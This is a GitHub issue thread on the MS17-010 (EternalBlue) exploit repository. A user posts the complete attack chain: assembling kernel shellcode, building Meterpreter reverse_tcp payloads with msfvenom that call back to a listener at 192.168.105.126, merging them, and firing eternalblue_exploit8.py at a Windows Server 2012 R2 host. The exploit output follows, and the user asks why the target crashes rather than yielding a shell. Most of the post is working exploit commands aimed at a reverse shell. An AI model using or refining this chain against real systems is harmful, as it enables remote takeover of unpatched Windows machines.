worawit / MS17-010

MS17-010
2.13k stars 1.1k forks source link

Windows Server 2012 r2 Standard Crashes #41

Open xochilpili opened 4 years ago

xochilpili commented 4 years ago

Hello,

Im doing some test with windows server 2012 r2 (fresh install), then using this steps:

nasm -f bin eternalblue_kshellcode_x64.asm nasm -f bin eternalblue_kshellcode_x86.asm

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4444

msfvenom -p windows/meterpreter/reverse_tcp -f raw -o meterpreter_msf_x86.bin EXITFUNC=thread LHOST=192.168.105.126 LPORT=4445

cat eternalblue_kshellcode_x64 meterpreter_msf.bin > meterpreter_payload.bin cat eternalblue_kshellcode_x86 meterpreter_msf_x86.bin > meterpreter_msf_x86.bin

python eternalblue_sc_merge.py meterpreter_payload.bin meterpreter_msf_x86_payload.bin sc_all.bin

eternalblue_exploit8.py << set valid credentials use msfconsole with exploit/multi/handler

python eternalblue_exploit8.py 192.168.105.163 sc_all.bin 12

shellcode size: 2568 numGroomConn: 12 Target OS: Windows Server 2012 R2 Standard 9600 got good NT Trans response got good NT Trans response SMB1 session setup allocate nonpaged pool success SMB1 session setup allocate nonpaged pool success good response status for nx: INVALID_PARAMETER good response status: INVALID_PARAMETER done

Windows Server 2012 R2 always crashes and reboot, no session created. Am i missing something ?

tomovic commented 4 years ago

safe mode?